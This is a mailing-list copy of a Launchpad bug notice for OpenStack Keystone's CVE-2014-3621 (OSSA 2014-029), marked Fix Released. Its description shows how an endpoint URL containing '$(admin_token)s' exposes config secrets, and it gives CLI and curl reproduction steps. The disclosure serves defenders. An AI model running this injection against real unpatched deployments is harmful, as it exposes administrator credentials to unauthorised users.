yahoo-eng-team team mailing list archive
-
yahoo-eng-team team
-
Mailing list archive
-
Message #22616
[Bug 1354208] Re: [OSSA 2014-029] Catalog replacement allows reading config (CVE-2014-3621)
** Changed in: keystone
Status: Fix Committed => Fix Released
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1354208
Title:
[OSSA 2014-029] Catalog replacement allows reading config
(CVE-2014-3621)
Status in OpenStack Identity (Keystone):
Fix Released
Status in Keystone havana series:
Fix Released
Status in Keystone icehouse series:
Fix Committed
Status in OpenStack Security Advisories:
Fix Released
Bug description:
Anyone that can create endpoints can read any value out of the config file. Some of the values in the config file are passwords and things that shouldn't be made available.
For example, I'm running and cloud and I allow someone to define their
own endpoints for whatever reason... maybe they control their own
subcloud. If the admin creates an endpoint with $(admin_token), then
queries the catalog, they can read the admin token out of the config
file.
I don't know what the fix is. Maybe a whitelist of config options?
Maybe leaving "secret=True" config options out of the dict is good
enough?
Here's steps to recreate:
$ openstack service create --type test test
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | None |
| enabled | True |
| id | 9251fab0a273454d84046c810b3503a7 |
| name | test |
| type | test |
+-------------+----------------------------------+
# Define an endpoint with $(admin_token)s.
$ openstack endpoint create 9251fab0a273454d84046c810b3503a7 --publicurl 'http://something/$(admin_token)s'
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| id | 164abc0b305e4ad998ac732cda569cd6 |
| publicurl | http://something/$(admin_token)s |
| region | None |
| service_id | 9251fab0a273454d84046c810b3503a7 |
| service_name | test |
| service_type | test |
+--------------+----------------------------------+
# Get a scoped token using curl.
$ curl -i -H "Content-Type: application/json" -d '
{ "auth": {
"identity": {
"methods": ["password"],
"password": {
"user": {
"name": "admin",
"domain": { "id": "default" },
"password": "mypassword"
}
}
},
"scope": {
"project": {
"name": "demo",
"domain": { "id": "default" }
}
}
}
}' http://localhost:35357/v3/auth/tokens ; echo
... Look for the admin token in the catalog in the response:
{"endpoints": [{"url": "http://something/myadmintoken",
...
To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1354208/+subscriptions